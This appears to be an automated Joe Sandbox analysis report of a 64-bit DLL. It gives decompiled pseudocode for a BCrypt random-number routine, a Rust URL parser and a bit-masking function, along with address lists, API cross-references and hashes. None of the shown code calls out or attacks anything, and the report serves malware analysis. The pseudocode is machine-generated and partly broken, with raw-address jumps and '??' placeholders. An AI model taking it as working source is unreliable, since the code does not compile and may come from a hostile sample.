0x7fef30a38a6
0x7fef30a38a8
0x7fef30a38aa
0x7fef30a38ab
0x7fef30a38ac
0x7fef30a38ad
0x7fef30a38ae
0x7fef30a38af
0x7fef30a38b1
0x7fef30a38b9
0x7fef30a38bf
0x7fef30a38c2
0x7fef30a38cd
0x7fef30a38da
0x7fef30a38eb
0x7fef30a38fa
0x7fef30a38ff
0x7fef30a3904
0x7fef30a3909
0x7fef30a390b
0x7fef30a3921
0x7fef30a3931
0x7fef30a3933
0x7fef30a3945
0x7fef30a394a
0x7fef30a394c
0x7fef30a3951
0x7fef30a3953
0x7fef30a3956
0x7fef30a3960

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 000007FEF30A399F
BCryptCloseAlgorithmProvider.BCRYPT ref: 000007FEF30A39CC
BCryptGenRandom.BCRYPT ref: 000007FEF30A39EB

Strings

RNG, xrefs: 000007FEF30A398D

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: Crypt$AlgorithmProvider$CloseOpenRandom
String ID: RNG
API String ID: 4129304314-373003636
Opcode ID: 8943115c2c7715f36d390bf0e41bb4dedfc466c396fabd41107518cb12c39ca9
Instruction ID: afea8dbe8b4be96cfd9551f9d40c063e707d63b085d3300515bfeb02b7e0e8fb
Opcode Fuzzy Hash: 8943115c2c7715f36d390bf0e41bb4dedfc466c396fabd41107518cb12c39ca9
Instruction Fuzzy Hash: A6419132A1DA4586EB908B11F48076AB7E2F788784F505136EACE47BA8EF3CD045DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BF31F Relevance: 6.8, APIs: 2, Strings: 2, Instructions: 813
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E000007FE7FEF30BF31F(void* __edx, void* __esp, long long __rax, long long __rcx, long long __rdx, intOrPtr* __r8, void* __r9) {
				long long _v168;
				char _v172;
				char _v176;
				char _v184;
				char _v188;
				long long _v192;
				long long _v200;
				intOrPtr _v216;
				long long _v224;
				long long _v232;
				long long _v236;
				long long _v240;
				intOrPtr _v244;
				char _v252;
				long long _v256;
				void* _v264;
				long long _v304;
				long long _v312;
				long long _v316;
				void* _v324;
				char _v392;
				char _v404;
				long long _v408;
				char _v416;
				intOrPtr _v420;
				long long _v424;
				long long _v428;
				char* _v432;
				char _v440;
				long long _v516;
				signed char _t94;
				signed char _t96;
				signed int _t102;
				signed int _t105;
				void* _t108;
				void* _t111;
				signed int _t114;
				signed char _t121;
				signed int _t126;
				signed int _t147;
				signed int _t154;
				void* _t155;
				signed int _t166;
				signed int _t175;
				void* _t178;
				signed int _t184;
				void* _t222;
				void* _t235;
				void* _t245;
				void* _t261;
				char _t265;
				long long _t271;
				intOrPtr _t272;
				long long _t273;
				intOrPtr* _t274;
				intOrPtr* _t275;
				long long _t280;
				long long* _t282;
				long long* _t283;
				long long* _t285;
				char* _t294;
				char* _t295;
				long long _t297;
				void* _t300;
				intOrPtr* _t301;
				void* _t302;
				intOrPtr _t308;
				signed long long _t310;
				void* _t315;
				signed long long _t322;
				intOrPtr _t323;
				long long _t325;
				long long _t328;
				void* _t331;
				intOrPtr _t332;
				void* _t335;
				intOrPtr _t342;
				void* _t345;
				void* _t351;
				long long _t352;
				long long _t356;
				long long _t358;
				char* _t359;
				unsigned long long _t361;

				_t297 = __rdx;
				_t271 = __rdx;
				_v408 = __rcx;
				E000007FE7FEF306239E(__rax, __r9);
				asm("movups xmm0, [ebx]");
				_t280 =  *((intOrPtr*)(_t271 + 0x18));
				_t325 =  *((intOrPtr*)(_t271 + 0x20));
				_v240 = __rax;
				_v232 = _t297;
				_v224 = 0;
				asm("movups [esp+0x140], xmm0");
				_v200 =  *((intOrPtr*)(_t271 + 0x10));
				_v192 = _t280;
				_v416 = _t325;
				_v184 = _t325;
				_v176 = 0;
				_t335 = __r9 + __r8;
				r8d = 0;
				_t298 = __r8;
				_t345 = _t315;
				if (__r8 == _t335) goto 0xf30bf462;
				_t94 =  *((intOrPtr*)(__r8));
				_t114 = _t94 & 0x000000ff;
				if (_t114 < 0) goto 0xf30bf3cd;
				goto 0xf30bf433;
				if (_t114 - 0xdf <= 0) goto 0xf30bf41b;
				_t147 = ( *(__r8 + 1) & 0x3f) << 6;
				if (_t94 - 0xf0 < 0) goto 0xf30bf428;
				_t184 = (_t114 & 7) << 0x12;
				_t166 = ( *(__r8 + 2) & 0x3f | _t147) << 6;
				if (( *(__r8 + 3) & 0x3f | _t166 | _t184) == 0x110000) goto 0xf30bf925;
				goto 0xf30bf43f;
				goto 0xf30bf433;
				_t21 = _t298 + 3; // 0x3
				if ((_t166 | (_t184 << 0x00000006 | _t147) << 0x0000000c) - 0x21 < 0) goto 0xf30bf3b2;
				_t331 = _t345;
				goto 0xf30bf46b;
				_t261 = _t335;
				r12d = 0;
				if (_t261 == _t335) goto 0xf30bf4e6;
				_t300 = _t335;
				_t121 =  *((intOrPtr*)(_t335 - 1));
				if (_t121 < 0) goto 0xf30bf484;
				goto 0xf30bf4d8;
				if (bpl - 0xc0 >= 0) goto 0xf30bf4ad;
				if (sil - 0xc0 >= 0) goto 0xf30bf4b6;
				goto 0xf30bf4bd;
				goto 0xf30bf4c5;
				_t175 = _t121 & 0x3f | ( *(_t300 - 2) & 0x1f | (( *(_t300 - 3) & 0x3f | ( *(_t300 - 4) & 7) << 0x00000006) & 0x0000000f) << 0x00000006) << 0x00000006;
				if (_t175 == 0x110000) goto 0xf30bf4e6;
				if (_t175 - 0x21 < 0) goto 0xf30bf46b;
				_t351 = _t345 - __r8 + _t21 - _t261 + _t300;
				_t358 = _t331 + __r8;
				if (_t280 == 0) goto 0xf30bf5a4;
				if (_t351 - _t331 - __r9 >= 0) goto 0xf30bf50e;
				 *((intOrPtr*)(_v416 + 0x28))();
				r8d = 0x2600;
				_t301 = _t358;
				if (_t301 == _t351 + __r8) goto 0xf30bf5a4;
				_t96 =  *_t301;
				if (bpl < 0) goto 0xf30bf533;
				_t302 = _t301 + 1;
				goto 0xf30bf58f;
				if (bpl - 0xdf <= 0) goto 0xf30bf577;
				_t178 = ( *(_t302 + 1) & 0x3f) << 6;
				if (_t96 - 0xf0 < 0) goto 0xf30bf584;
				_t126 = (_t96 & 7) << 0x12;
				_t154 = ( *(_t302 + 2) & 0x3f | _t178) << 6;
				if (( *(_t302 + 3) & 0x3f | _t154 | _t126) == 0x110000) goto 0xf30bf5a4;
				goto 0xf30bf58f;
				goto 0xf30bf58f;
				_t155 = _t154 | (_t126 << 0x00000006 | _t178) << 0x0000000c;
				_t222 = _t155 - 0xd;
				if (_t222 > 0) goto 0xf30bf51b;
				asm("inc ecx");
				if (_t222 >= 0) goto 0xf30bf51b;
				_t265 = _v416;
				 *((intOrPtr*)(_t265 + 0x28))();
				_t356 = __r8 + _t351;
				_t328 = _t358;
				_v312 = _t358;
				_v304 = _t356;
				_t282 =  &_v392;
				 *_t282 = _t358;
				 *((long long*)(_t282 + 8)) = _t356;
				if (E000007FE7FEF30BDE7C(_t282) != 0x110000) goto 0xf30bf63b;
				_t272 = _v216;
				if (_t272 == 0) goto 0xf30bf6fb;
				_t283 =  &_v392;
				 *_t283 = _t328;
				 *((long long*)(_t283 + 8)) = _t356;
				if (E000007FE7FEF30BDE7C(_t283) != 0x23) goto 0xf30bf702;
				memcpy(_t155, _t178, 9);
				_v516 = _t356;
				_t332 = _t272;
				E000007FE7FEF30C3625(_v420,  &_v392, _t332, _t328);
				goto 0xf30bf8cf;
				_t285 =  &_v404;
				 *_t285 = _t328;
				 *((long long*)(_t285 + 8)) = _t356;
				_t102 = E000007FE7FEF30BDE7C(_t285);
				if (_t102 == 0x110000) goto 0xf30bf5d5;
				if ((_t102 & 0xffffffdf) + 0xffffffa5 - 0xffffffe6 < 0) goto 0xf30bf5d5;
				_t359 =  &_v252;
				_t105 = E000007FE7FEF30BDE7C( &_v324);
				if (_t105 == 0x110000) goto 0xf30bf741;
				_t54 = _t265 - 0x61; // -97
				_t55 = _t265 - 0x41; // -65
				if (_t54 - 0x1a < 0) goto 0xf30bf6b7;
				if (_t55 - 0x1a < 0) goto 0xf30bf6b7;
				_t56 = _t265 - 0x30; // -48
				if (_t56 - 0xa < 0) goto 0xf30bf6b7;
				_t57 = _t265 - 0x2d; // -45
				if (_t57 - 2 < 0) goto 0xf30bf6b7;
				if (_t105 != 0x2b) goto 0xf30bf90b;
				_t180 =  >=  ? _t105 : (_t105 ^ 0x00000020) & 0x000000ff;
				_t235 = _t272 - _v244;
				if (_t235 != 0) goto 0xf30bf6ea;
				E000007FE7FEF30A62B2(_t235, _t359, _t272);
				_t273 = _v236;
				 *((intOrPtr*)(_v252 + _t273)) = sil;
				_t274 = _t273 + 1;
				_v236 = _t274;
				goto 0xf30bf67b;
				goto 0xf30bf89c;
				r9d =  *((intOrPtr*)(_t274 + 0x18));
				r8d = r9d;
				_t308 =  *((intOrPtr*)(_t274 + 0x10));
				r8d = r8d + 1;
				if (_t235 == 0) goto 0xf30bf86c;
				if (_t308 - _t332 <= 0) goto 0xf30bf866;
				if ( *((char*)( *_t274 + _t332)) - 0xbf > 0) goto 0xf30bf86c;
				_v516 = 0xf314d3e8;
				_t342 = _t308;
				goto 0xf30c0095;
				if (_v188 != 1) goto 0xf30bf914;
				_v428 = _v324;
				_t352 = _v316;
				_t108 = memcpy(_t178 + 0x12,  >=  ? _t105 : (_t105 ^ 0x00000020) & 0x000000ff, 9);
				_t322 =  *((intOrPtr*)( &_v172 + 0x10));
				r14d = 0x901;
				_t360 =  ==  ? _t322 << 0x00000020 | 0x00000900 : _t359;
				if (r14b != 0) goto 0xf30bf8e4;
				E000007FE7FEF30C0150();
				r13d = _t108;
				if (_t322 != _v176) goto 0xf30bf7e8;
				_t275 =  &_v184;
				_t310 = _t322;
				E000007FE7FEF30A62B2(_t322 - _v176, _t275, _t310);
				_t323 =  *((intOrPtr*)(_t275 + 0x10));
				 *((char*)( *_t275 + _t323)) = 0x3a;
				_v168 = _t323 + 1;
				if (r13b == 0) goto 0xf30bf99e;
				_t361 = ( ==  ? _t322 << 0x00000020 | 0x00000900 : _t359) >> 0x20;
				if ((r13b & 0xffffffff) != 1) goto 0xf30bfa6a;
				_v424 = _t352;
				_v416 = _v440;
				_v408 = _t352;
				_t294 =  &_v416;
				_t111 = E000007FE7FEF30BDE7C(_t294);
				if (_t111 == 0x5c) goto 0xf30bf852;
				_t245 = _t111 - 0x2f;
				if (_t245 != 0) goto 0xf30bfa22;
				goto 0xf30bf82c;
				if (_t245 != 0) goto 0xf30bf72d;
				if (_t310 == _t332) goto 0xf30bf89c;
				if ( *((char*)(_t294 + _t332)) != 0x2f) goto 0xf30bf89c;
				if (r9d == 0) goto 0xf30bf936;
				if (_t310 - _t342 <= 0) goto 0xf30bf930;
				if ( *((char*)(_t294 + _t342)) - 0xbf > 0) goto 0xf30bf936;
				goto 0xf30c0086;
				_t295 = _v432;
				 *_t295 = 7;
				 *((intOrPtr*)(_t295 + 0x2c)) = 2;
				if (_v256 == 0) goto 0xf30bf8cf;
				return HeapFree(??, ??, ??);
			}

0x7fef30bf31f
0x7fef30bf338
0x7fef30bf33b
0x7fef30bf346
0x7fef30bf34e
0x7fef30bf355
0x7fef30bf359
0x7fef30bf35d
0x7fef30bf365
0x7fef30bf36d
0x7fef30bf379
0x7fef30bf381
0x7fef30bf389
0x7fef30bf391
0x7fef30bf396
0x7fef30bf39e
0x7fef30bf3a6
0x7fef30bf3aa
0x7fef30bf3ad
0x7fef30bf3b2
0x7fef30bf3b8
0x7fef30bf3be
0x7fef30bf3c0
0x7fef30bf3c5
0x7fef30bf3cb
0x7fef30bf3dc
0x7fef30bf3e2
0x7fef30bf3ec
0x7fef30bf3f9
0x7fef30bf3fc
0x7fef30bf40c
0x7fef30bf419
0x7fef30bf426
0x7fef30bf428
0x7fef30bf445
0x7fef30bf457
0x7fef30bf460
0x7fef30bf465
0x7fef30bf468
0x7fef30bf46e
0x7fef30bf470
0x7fef30bf473
0x7fef30bf479
0x7fef30bf482
0x7fef30bf48c
0x7fef30bf496
0x7fef30bf4ab
0x7fef30bf4b4
0x7fef30bf4ce
0x7fef30bf4d6
0x7fef30bf4db
0x7fef30bf4e3
0x7fef30bf4e6
0x7fef30bf4ed
0x7fef30bf4fc
0x7fef30bf508
0x7fef30bf512
0x7fef30bf518
0x7fef30bf51e
0x7fef30bf524
0x7fef30bf52c
0x7fef30bf52e
0x7fef30bf531
0x7fef30bf543
0x7fef30bf549
0x7fef30bf553
0x7fef30bf55c
0x7fef30bf55f
0x7fef30bf56f
0x7fef30bf575
0x7fef30bf582
0x7fef30bf58b
0x7fef30bf58f
0x7fef30bf592
0x7fef30bf594
0x7fef30bf598
0x7fef30bf59c
0x7fef30bf5a1
0x7fef30bf5a4
0x7fef30bf5a7
0x7fef30bf5aa
0x7fef30bf5b2
0x7fef30bf5ba
0x7fef30bf5c2
0x7fef30bf5c5
0x7fef30bf5d3
0x7fef30bf5d5
0x7fef30bf5e0
0x7fef30bf5e6
0x7fef30bf5ee
0x7fef30bf5f1
0x7fef30bf5fd
0x7fef30bf61b
0x7fef30bf61e
0x7fef30bf62b
0x7fef30bf631
0x7fef30bf636
0x7fef30bf63b
0x7fef30bf643
0x7fef30bf646
0x7fef30bf64a
0x7fef30bf654
0x7fef30bf663
0x7fef30bf673
0x7fef30bf67e
0x7fef30bf688
0x7fef30bf68e
0x7fef30bf691
0x7fef30bf697
0x7fef30bf69c
0x7fef30bf69e
0x7fef30bf6a4
0x7fef30bf6a6
0x7fef30bf6ac
0x7fef30bf6b1
0x7fef30bf6c2
0x7fef30bf6c5
0x7fef30bf6cd
0x7fef30bf6d5
0x7fef30bf6e2
0x7fef30bf6ea
0x7fef30bf6ee
0x7fef30bf6f1
0x7fef30bf6f9
0x7fef30bf6fd
0x7fef30bf702
0x7fef30bf706
0x7fef30bf70c
0x7fef30bf710
0x7fef30bf713
0x7fef30bf71c
0x7fef30bf727
0x7fef30bf734
0x7fef30bf739
0x7fef30bf73c
0x7fef30bf749
0x7fef30bf757
0x7fef30bf75c
0x7fef30bf77c
0x7fef30bf77f
0x7fef30bf79b
0x7fef30bf7a1
0x7fef30bf7a8
0x7fef30bf7bc
0x7fef30bf7c1
0x7fef30bf7cc
0x7fef30bf7ce
0x7fef30bf7d9
0x7fef30bf7dc
0x7fef30bf7e4
0x7fef30bf7e8
0x7fef30bf7f0
0x7fef30bf7fb
0x7fef30bf801
0x7fef30bf80c
0x7fef30bf81c
0x7fef30bf82c
0x7fef30bf834
0x7fef30bf83c
0x7fef30bf83f
0x7fef30bf847
0x7fef30bf849
0x7fef30bf84c
0x7fef30bf864
0x7fef30bf866
0x7fef30bf871
0x7fef30bf878
0x7fef30bf87d
0x7fef30bf886
0x7fef30bf891
0x7fef30bf897
0x7fef30bf89c
0x7fef30bf8a4
0x7fef30bf8a6
0x7fef30bf8b6
0x7fef30bf8e3

APIs

HeapFree.KERNEL32 ref: 000007FEF30BF8C9
HeapFree.KERNEL32 ref: 000007FEF30BFF79

Strings

file. lib.rs\src\parser.rs, xrefs: 000007FEF30BFDA8
//file://, xrefs: 000007FEF30BF9C7, 000007FEF30BFA96

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: //file://$file. lib.rs\src\parser.rs
API String ID: 3298025750-669867474
Opcode ID: 439b7d6b67871acc79eab96672227e64e8b36e863795553b646978f3d6c8e4a4
Instruction ID: 69349a2a3f6fbcf750990fc013bbec1bf733107e81f2492dd10d6358d2c575ba
Opcode Fuzzy Hash: 439b7d6b67871acc79eab96672227e64e8b36e863795553b646978f3d6c8e4a4
Instruction Fuzzy Hash: 7272B432A0CAD589EAB08B15A4503BEB7E2F385BC4F544123DE8D97BA9DB3CD545E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF306524D Relevance: 6.4, Strings: 5, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF306524D(signed int __eax, void* __ecx, signed int __rcx, signed int __rdx) {
				signed long long _t134;
				signed int* _t226;
				signed long long _t228;
				signed long long _t250;
				signed long long _t256;
				signed long long _t267;

				_t267 = 0x1111111111111110 & __rcx;
				_t250 = 0x2222222222222220 & __rcx;
				_t256 = 0x4444444444444440 & __rcx;
				_t134 = __rdx & 0x11111111;
				_t226[2] = _t134;
				_t226[4] = _t267;
				_t226[8] = _t250;
				 *_t226 = 0x88888888;
				_t228 = __rdx & 0x44444444;
				_t226[6] = _t256;
				_t226[0xe] = 0;
				_t226[0xc] = __rdx & 0x22222222 ^ _t228 ^ __rdx & 0x88888888 ^ _t134;
				_t226[0xa] = _t228;
				return __eax * _t267 * _t250 * _t256 * 0x88888888 * _t267 * _t250 * _t256 *  *_t226 * _t226[4] * _t226[8] * _t226[6] *  *_t226 * _t226[4] * _t226[8] * _t226[6] *  *_t226;
			}

0x7fef3065271
0x7fef3065282
0x7fef3065299
0x7fef30652a9
0x7fef30652ac
0x7fef30652ba
0x7fef30652cb
0x7fef30652e0
0x7fef30652ea
0x7fef30652f3
0x7fef306531d
0x7fef3065328
0x7fef306537d
0x7fef30654dd

Strings

"""""""", xrefs: 000007FEF3065274
DDDDDDDD, xrefs: 000007FEF306548D
"""""""", xrefs: 000007FEF3065304
DDDDDDDD, xrefs: 000007FEF3065285
"""""""", xrefs: 000007FEF306547D

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: """"""""$""""""""$""""""""$DDDDDDDD$DDDDDDDD
API String ID: 0-1223203014
Opcode ID: a47d0fd26e6d44c7981efb02df84c6f687fe759bf1b02c2b2463a1146d1615f4
Instruction ID: f6ccf7d2d1ff2f76ef0be6514b75084cfc547a60442bcd35edb8870353553582
Opcode Fuzzy Hash: a47d0fd26e6d44c7981efb02df84c6f687fe759bf1b02c2b2463a1146d1615f4
Instruction Fuzzy Hash: CA511653B11BA84E6B10CFB36D13987D645B358FD8B0CE330AE5CABB68D57ED502A204

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C3B13 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 303
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E000007FE7FEF30C3B13(void* __edx, unsigned long long __rax, long long __rcx, intOrPtr* __rdx, void* __r8) {
				void* _t86;
				unsigned int _t91;
				unsigned int _t98;
				void* _t119;
				intOrPtr _t127;
				void* _t130;
				void* _t135;
				void* _t157;
				unsigned long long _t176;
				long long _t179;
				long long _t185;
				intOrPtr _t190;
				long long _t192;
				unsigned long long _t194;
				signed long long _t224;
				intOrPtr _t225;
				long long _t226;
				intOrPtr _t229;
				long long* _t238;
				signed long long _t239;
				intOrPtr _t240;
				intOrPtr* _t243;
				long long* _t244;
				intOrPtr _t245;
				long long* _t247;
				intOrPtr* _t250;
				void* _t251;
				void* _t264;
				long long _t265;
				intOrPtr _t266;
				intOrPtr _t268;

				_t243 = __rdx;
				asm("movaps xmm0, [esp+0x120]");
				asm("movups [ecx], xmm0");
				_t86 = E000007FE7FEF30BDE7C(_t251 + 0x70);
				if (_t86 == 0x23) goto 0xf30c3b69;
				if (_t86 == 0x3f) goto 0xf30c3b75;
				if (_t86 != 0x110000) goto 0xf30c3fad;
				 *((intOrPtr*)(__rcx)) = 0;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				goto 0xf30c3f7a;
				 *(_t251 + 0x48) = __rax;
				goto 0xf30c3ef9;
				_t224 =  *((intOrPtr*)(_t243 + 0x10));
				_t176 = _t224 >> 0x20;
				_t177 =  ==  ? _t224 << 0x00000020 | 0x00000900 : _t176;
				if (0x901 != 0) goto 0xf30c3f6f;
				_t178 = ( ==  ? _t224 << 0x00000020 | 0x00000900 : _t176) >> 0x20;
				 *((long long*)(_t251 + 0x80)) = __rcx;
				 *(_t251 + 0x48) = ( ==  ? _t224 << 0x00000020 | 0x00000900 : _t176) >> 0x20;
				 *((char*)(_t251 + 0x2f)) = r8d;
				 *((intOrPtr*)(_t251 + 0x6c)) = 0;
				if (_t224 !=  *((intOrPtr*)(_t243 + 8))) goto 0xf30c3bcd;
				E000007FE7FEF30A62B2(_t224 -  *((intOrPtr*)(_t243 + 8)), _t243, _t224);
				_t225 =  *((intOrPtr*)(_t243 + 0x10));
				_t190 =  *_t243;
				 *((char*)(_t190 + _t225)) = 0x3f;
				_t226 = _t225 + 1;
				 *((long long*)(_t251 + 0x98)) = _t226;
				 *((long long*)(_t243 + 0x10)) = _t226;
				_t179 =  *((intOrPtr*)(_t251 + 0x70));
				_t247 = _t251 + 0x88;
				 *_t247 = _t179;
				 *((long long*)(_t247 + 8)) =  *((intOrPtr*)(_t251 + 0x78));
				E000007FE7FEF306239E(_t179,  *((intOrPtr*)(_t251 + 0x78)) - _t179);
				_t244 = _t251 + 0x50;
				 *_t244 = _t179;
				 *((long long*)(_t244 + 8)) = _t226;
				 *((long long*)(_t244 + 0x10)) = 0;
				r13b =  *((intOrPtr*)(_t243 + 0x40));
				_t266 =  *((intOrPtr*)(_t243 + 0x30));
				_t268 =  *((intOrPtr*)(_t243 + 0x38));
				_t91 = E000007FE7FEF30BDE7C(_t247);
				r12d = _t91;
				if (_t91 == 0x23) goto 0xf30c3ca2;
				if (r12d == 0x110000) goto 0xf30c3d6d;
				 *((long long*)(_t251 + 0x20)) =  *((intOrPtr*)(_t251 + 0x90));
				r8d = r12d;
				E000007FE7FEF30C395D(_t266, _t268, __r8,  *((intOrPtr*)(_t251 + 0x88)));
				if (r12d - 0x80 < 0) goto 0xf30c3cb9;
				 *(_t251 + 0x30) = 0;
				if (r12d - 0x800 >= 0) goto 0xf30c3ce8;
				 *(_t251 + 0x30) = r12d >> 0x00000006 | 0x000000c0;
				r12b = r12b & 0x0000003f;
				r12b = r12b | 0x00000080;
				 *(_t251 + 0x31) = r12b;
				goto 0xf30c3d53;
				if (r13b == 0) goto 0xf30c3d72;
				if (_t266 == 0) goto 0xf30c3cb9;
				 *((intOrPtr*)(_t268 + 0x28))();
				if ( *((intOrPtr*)(_t251 + 0x60)) !=  *((intOrPtr*)(_t251 + 0x58))) goto 0xf30c3cd2;
				_t98 = E000007FE7FEF30A62B2( *((intOrPtr*)(_t251 + 0x60)) -  *((intOrPtr*)(_t251 + 0x58)), _t244,  *((intOrPtr*)(_t251 + 0x60)));
				_t229 =  *((intOrPtr*)(_t251 + 0x60));
				 *( *((intOrPtr*)(_t251 + 0x50)) + _t229) = r12b;
				 *((long long*)(_t251 + 0x60)) = _t229 + 1;
				goto 0xf30c3c25;
				if (r12d - 0x10000 >= 0) goto 0xf30c3d1c;
				 *(_t251 + 0x30) = _t98 >> 0x0000000c | 0x000000e0;
				 *(_t251 + 0x31) = r12d >> 0x00000006 & 0x0000003f | 0x00000080;
				r12b = r12b & 0x0000003f;
				r12b = r12b | 0x00000080;
				 *(_t251 + 0x32) = r12b;
				goto 0xf30c3d53;
				 *(_t251 + 0x30) = 0xbadbfd;
				 *(_t251 + 0x31) = r12d >> 0x0000000c & 0x0000003f | 0x00000080;
				 *(_t251 + 0x32) = r12d >> 0x00000006 & 0x0000003f | 0x00000080;
				r12b = r12b & 0x0000003f;
				r12b = r12b | 0x00000080;
				 *(_t251 + 0x33) = r12b;
				E000007FE7FEF3062221(_t244, _t251 + 0x30, _t251 +  *((intOrPtr*)(_t251 + 0x50)) + 0x30);
				goto 0xf30c3c25;
				r12d = 0;
				goto 0xf30c3d82;
				_t265 =  *((intOrPtr*)(_t251 + 0x88));
				if ( *((intOrPtr*)(_t251 + 0x6c)) == 0) goto 0xf30c3e40;
				if ( *((intOrPtr*)(_t251 + 0x98)) - _t244 <= 0) goto 0xf30c3dbf;
				_t157 =  *((char*)(_t190 + _t244)) - 0xbf;
				if (_t157 > 0) goto 0xf30c3dc1;
				 *((long long*)(_t251 + 0x20)) = 0xf314d358;
				r8d = 0;
				_t119 = E000007FE7FEF30FE410(r8d, _t130, 6, _t135, _t157, _t190,  *((intOrPtr*)(_t251 + 0x98)), _t251 +  *((intOrPtr*)(_t251 + 0x50)) + 0x30, _t244, _t264);
				asm("ud2");
				if (_t157 != 0) goto 0xf30c3da3;
				if (_t119 == 3) goto 0xf30c3df8;
				if (_t119 == 5) goto 0xf30c3def;
				if (_t119 != 4) goto 0xf30c3e40;
				if (E000007FE7FEF30F2860(_t130, _t190, "httphttpsfile. lib.rs\\src\\parser.rs", _t244) == 0) goto 0xf30c3e0e;
				goto 0xf30c3dff;
				goto 0xf30c3dff;
				if (E000007FE7FEF30F2860(_t130, _t190, "ftphttphttpsfile. lib.rs\\src\\parser.rs", _t244) != 0) goto 0xf30c3e40;
				if ( *((intOrPtr*)(_t243 + 0x20)) == 0) goto 0xf30c3e40;
				 *((intOrPtr*)( *((intOrPtr*)(_t243 + 0x28)) + 0x28))();
				_t245 =  *((intOrPtr*)(_t251 + 0xa0));
				goto 0xf30c3e68;
				_t192 =  *((intOrPtr*)(_t251 + 0x50));
				_t185 =  *((intOrPtr*)(_t251 + 0x60));
				 *((long long*)(_t251 + 0xa8)) = _t192;
				 *((long long*)(_t251 + 0xb0)) = _t185;
				 *((long long*)(_t251 + 0xa0)) = 0;
				_t249 =  ==  ? 0xf314d380 : 0xf314d370;
				_t214 =  ==  ? _t192 : _t245;
				_t238 = _t251 + 0x30;
				 *_t238 =  ==  ? _t192 : _t245;
				 *((long long*)(_t238 + 8)) = _t185;
				 *((long long*)(_t238 + 0x10)) =  ==  ? 0xf314d380 : 0xf314d370;
				E000007FE7FEF30623E3(_t243, _t238);
				if (_t245 == 0) goto 0xf30c3ebd;
				if (_t192 == 0) goto 0xf30c3ebd;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t251 + 0x58)) == 0) goto 0xf30c3ed9;
				HeapFree(??, ??, ??);
				if (_t265 == 0) goto 0xf30c3f8e;
				 *((long long*)(_t251 + 0x70)) = _t265;
				 *((long long*)(_t251 + 0x78)) =  *((intOrPtr*)(_t251 + 0x90));
				_t250 =  *((intOrPtr*)(_t251 + 0x80));
				_t239 =  *((intOrPtr*)(_t243 + 0x10));
				_t193 =  ==  ? _t239 << 0x00000020 | 0x00000900 : _t192;
				if (0x901 != 0) goto 0xf30c3f6f;
				_t194 = ( ==  ? _t239 << 0x00000020 | 0x00000900 : _t192) >> 0x20;
				if (_t239 !=  *((intOrPtr*)(_t243 + 8))) goto 0xf30c3f38;
				E000007FE7FEF30A62B2(_t239 -  *((intOrPtr*)(_t243 + 8)), _t243, _t239);
				_t240 =  *((intOrPtr*)(_t243 + 0x10));
				 *((char*)( *_t243 + _t240)) = 0x23;
				 *((long long*)(_t243 + 0x10)) = _t240 + 1;
				_t127 = E000007FE7FEF30C37D3(_t243,  *((intOrPtr*)(_t251 + 0x70)),  *((intOrPtr*)(_t251 + 0x78)));
				 *_t250 = 1;
				 *((intOrPtr*)(_t250 + 4)) = _t127;
				 *((intOrPtr*)(_t250 + 8)) = 1;
				 *((intOrPtr*)(_t250 + 0xc)) = 0x901;
				goto 0xf30c3f7a;
				 *((char*)(_t250 + 4)) = 9;
				 *_t250 = 2;
				return _t127;
			}

0x7fef30c3b2c
0x7fef30c3b32
0x7fef30c3b3f
0x7fef30c3b42
0x7fef30c3b4a
0x7fef30c3b4f
0x7fef30c3b56
0x7fef30c3b5e
0x7fef30c3b61
0x7fef30c3b64
0x7fef30c3b6b
0x7fef30c3b70
0x7fef30c3b75
0x7fef30c3b7c
0x7fef30c3b96
0x7fef30c3b9c
0x7fef30c3ba2
0x7fef30c3baa
0x7fef30c3bb2
0x7fef30c3bb7
0x7fef30c3bbb
0x7fef30c3bbf
0x7fef30c3bc4
